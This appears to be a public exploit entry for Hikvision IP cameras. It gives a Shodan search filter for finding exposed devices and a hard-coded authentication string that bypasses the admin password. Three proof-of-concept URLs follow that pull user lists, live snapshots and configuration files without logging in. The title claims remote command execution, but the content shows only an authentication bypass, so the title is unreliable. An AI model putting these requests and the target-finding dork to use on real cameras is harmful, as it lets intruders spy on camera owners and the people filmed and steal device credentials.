# Exploit Title: Exploit Title: Hikvision Camera - Remote command execution # Date: 4/22/2024 # Google Dork : In Shodan search engine, the filter is "Web Version="3.1.3.150324" http.favicon.hash:999357577" # Exploit Author: parsa rezaie khiabanloo # Tested on: Windows/Linux # 1. Description: Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that needed was appending this string to Hikvision camera commands: (?auth=YWRtaW46MTEK). # An issue was discovered in Hikvision IP Camera. # 2 . Proof of Concept: Retrieve a list of all users and their roles: - http://camera.ip/Security/users?auth=YWRtaW46MTEK Obtain a camera snapshot without authentication: - http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK Download camera configuration: - http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK